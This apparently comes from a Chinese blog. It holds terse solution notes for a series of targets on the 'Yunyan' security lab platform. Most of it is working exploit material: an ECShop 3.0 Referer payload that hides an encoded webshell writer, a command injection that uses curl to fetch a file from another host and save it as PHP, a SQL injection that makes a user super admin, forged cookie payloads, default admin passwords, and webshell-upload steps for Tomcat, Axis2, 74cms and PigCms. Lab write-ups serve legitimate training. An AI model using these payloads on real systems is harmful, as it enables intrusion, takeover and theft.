云演系统测试

http://63053cf3af6fe0aa.yunyansec.com/

Ecshop v.3.0远程代码执行

访问user.php,添加

Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:289:”*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1′ UNION/*”;}45ea207d7a2b68c49582d2d22adf953a

根目录生成1.php,密码1337

http://b5bddb48175c113e.yunyansec.com/

about.php 可以下载文件

http://b5bddb48175c113e.yunyansec.com/download.php?a=address.txt

把address.txt改成download.php

访问admin,403

访问admin/login.php

下载http://b5bddb48175c113e.yunyansec.com/download.php?a=admin/login.php,看到check.php

下载http://b5bddb48175c113e.yunyansec.com/download.php?a=admin/check.php,看到mainx1112111.php

下载http://b5bddb48175c113e.yunyansec.com/download.php?a=admin/mainx1112111.php,看到<?php system(“ping -c 2”.$_GET[ip]);?>

绕过命令执行的空格(;),curl 下载文件,getshell

b5bddb48175c113e.yunyansec.com/admin/mainx1112111.php?ip=11;curl http://63053cf3af6fe0aa.yunyansec.com/fuck.html > look.php

http://e4dcb0cc015585c8.yunyansec.com/

读取tomcat配置文件:

tomcat默认管理界面上传war包,getshell

http://e3636c9c755c1643.yunyansec.com/

x-forwarded-for sql

admin:P4ssw0rd

登陆,new picture,上传图片。。

上传个图片一句话,然后改后缀名在首页可以看到上传后的php,拿到webshell

http://0c0c723dc8a07d37.yunyansec.com/

http://0c0c723dc8a07d37.yunyansec.com/axis2/axis2-admin/login

默认axis2账号密码

Username: admin, Password: axis2

部署aar包,执行命令getshell

http://f0d8d92ecd163338.yunyansec.com

前后伪造

NjFiNTQ1OWIwMDli NjAuMjAuMTY3LjEyMzE1NDMwNjUwMzU2ODM YmY5NA

NjFiNTQ1OWIwMDli MTI3LjAuMC4xJiMwMzk7MTU0MzA0ODQxNjc1MA YmY5NA

NjFiNTQ1OWIwMDliJyB1bmlvbiBzZWxlY3QgMSwyLDMsJ2E6Mjp7czoyOiJpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMDoibG9naW5fdXNlciI7YToxNDp7czozOiJ1aWQiO3M6MToiMSI7czo1OiJ1bmFtZSI7czo1OiJhZG1pbiI7czo0OiJuYW1lIjtzOjU6ImFkbWluIjtzOjg6Imdyb3VwX2lkIjtzOjE6IjAiO3M6OToiZGVwYXJ0X2lkIjtzOjE6IjAiO3M6NDoidHlwZSI7czo3OiJkZWZhdWx0IjtzOjc6InZlcnNpb24iO3M6MDoiIjtzOjM6InNpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMzoibGFzdGxvZ2ludGltZSI7czoxOToiMjAxNC0wNS0xOSAxNjoxMDo0NyI7czo3OiJzaG9wX2lkIjtpOjA7czoxMDoidmVyaWZ5X3RlbCI7czoxOiIwIjtzOjEyOiJ2ZXJpZnlfZW1haWwiO3M6MToiMCI7czo1OiJzY29yZSI7aTowO3M6MTA6ImV4cGVyaWVuY2UiO2k6MTt9fScsNSw2IwYmY5NA

伪造登陆-系统添加允许上传php-菜单管理-上传图片

http://34c3ae0a4b6027db.yunyansec.com/

注册账号fuckyou,然后构造提升用户为super权限

http://34c3ae0a4b6027db.yunyansec.com/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%20@b;execute%20x;

登陆后台

http://34c3ae0a4b6027db.yunyansec.com/admin.php?m=user&f=login

后台拿shell,界面-素材管理-上传素材绕过编辑不能修改文件的限制,修改为一句话,连接index.php即可

http://090b41fbb2665fab.yunyansec.com

http://090b41fbb2665fab.yunyansec.com/admin/login.php

弱口令,admin,admin

栏目管理,新建总分类写入一句话,连接data/class.php

http://a878d407d9dbe312.yunyansec.com/

http://a878d407d9dbe312.yunyansec.com/eWebEditor/admin/default.php

ewebeditor 2.8,cms编辑器默认账号密码

admin

DvcFsyHHuvHM5wV4

添加样式管理远程文件上传php文件,预览样式,配置一个网站不解析php文件,远程上传php文件getshell

http://745f5fbcefe848ba.yunyansec.com/

74cms v3.6 打开就跳到安装页面,远程安装数据库之后,登陆后台

后台工具-风格模板

admin/admin_templates.php?act=edit_file&tpl_name=header.htm&tpl_dir=default

模板文件添加写文件php,添加计划任务,执行计划任务,admin目录下生成shell.php

http://3e2796e9ca1a434f.yunyansec.com/

PigCms3.1 微最强™后台V3.0重磅升级

注册账号存在注入

注入出账号密码为admin asdf412afa

后台页面被删除,获取登陆后的cookie

本地搭建,后台设置允许上传php,抓包改包

调用ckeditor上传php文件,getshell

0 条评论
发表一条评论